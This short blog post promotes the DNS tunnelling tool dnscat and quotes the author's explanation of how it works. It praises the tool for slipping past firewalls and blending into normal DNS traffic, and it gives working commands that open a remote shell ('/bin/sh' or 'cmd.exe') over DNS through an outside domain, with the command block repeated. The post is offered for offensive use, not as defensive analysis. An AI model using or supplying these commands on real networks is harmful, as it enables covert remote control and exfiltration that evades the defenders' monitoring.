today I wanna point out DNSCAT. Man in the Middle through DNS is not a new attack, in fact ettercap-ng does this attack from years, but DNSCAT is totally another music. Like NetCAT or NCat, DNSCAT allows direct communication between client and server. You can use it to exchange files, to send string os even to bind a reverse shell ;). To know something more:
Communicating by DNS is great because the client only needs the ability to talk to a single DNS server, any DNS server on the Internet (with recursion enabled). dnscat will, by default, use the system DNS server, which should cover basically every case. Firewalls aren't going to stop you from talking to your local DNS server, right? And I don't know about the average network, but on ours there are thousands of DNS queries every minute, so a little bit of extra traffic just gets lost in the flow.Example: Remote shell.
In brief, dnscat works by taking advantage of DNS recursion. It sends messages to the authoritative nameserver for a domain, which is the key -- to be a server, you have to be the authoritative nameserver for a domain. For example, I'm the authoritative server for skullseclabs.org, so any requests that end with .skullseclabs.org, no matter where they originate, will eventually connect to 208.81.2.52 (my current address).
Typically, to tunnel a shell over DNS, you're going to want to run a standard server as before:
dnscat --listen
And run the shell on the client side:
Linux/BSD:
dnscat --domain skullseclabs.org --exec "/bin/sh"
Windows:
dnscat.exe --domain skullseclabs.org --exec "cmd.exe"
dnscat --domain skullseclabs.org --exec "/bin/sh"
Windows:
dnscat.exe --domain skullseclabs.org --exec "cmd.exe"
On the server, you can now type commands and they'll run on the client side.
Download from mirror (RS), Home Page DNSCAT
Thank you RON, this is really awesome. Now ... how has enough time to write a Metasploit plugin ?
